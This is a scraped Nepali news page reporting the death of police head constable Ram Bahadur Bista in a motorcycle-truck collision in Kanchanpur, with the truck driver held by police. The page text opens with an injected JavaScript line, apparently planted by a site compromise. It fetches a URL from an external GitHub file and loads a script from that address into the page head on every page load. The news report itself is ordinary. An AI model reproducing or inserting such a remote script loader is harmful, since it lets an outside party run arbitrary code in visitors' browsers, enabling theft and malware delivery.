;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); मोटरसाइकल दुर्घटनामा परी प्रहरी हवल्दार राम बहादुर बिष्टको मृत्यु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • मोटरसाइकल दुर्घटनामा परी प्रहरी हवल्दार राम बहादुर बिष्टको मृत्यु
दुर्घटना/अपराध

मोटरसाइकल दुर्घटनामा परी प्रहरी हवल्दार राम बहादुर बिष्टको मृत्यु

मंसिर १४, हरिश्चन्द्र बाग,

कञ्चनपुर । कञ्चनपुरको वेदकोट नगरपालिका वडा नम्बर १ स्थित चम्फापुरमा मोटरसाइकल दुर्घटनामा परी नेपाल प्रहरीमा कार्यरत प्रहरी हवल्दार राम बहादुर बिष्टको मृत्यु भएको छ ।

लु १२ प ५१५ नम्बरको मोटरसाइकलमा कञ्चनपुरको झलारी स्थित घरबाट कार्यरत प्रहरी चौकी दोधाराचादँनी झुलुङ्गे पुल जाने क्रममा प्रहरी हवल्दार बिष्ट र से १ च १४०६ नम्बरको ट्रक आइतबार दिउँसो एकापसमा ठोक्किदा प्रहरी हवल्दारको घटनास्थलमै मृत्यु भएको कञ्चनपुर प्रहरीले जनाएको छ ।

मोटरसाइकललाई ठक्कर दिने ट्रक र ट्रक चालक यज्ञराज भट्टलाई नियन्त्रणमा लिइएको जिल्ला प्रहरी कार्यालय कञ्चनपुरका प्रवक्ता एवं प्रहरी नायव उपरीक्षक अमर बहादुर थापा क्षेत्रीले जानकारी दिए ।

फेसबुक प्रतिक्रियाहरु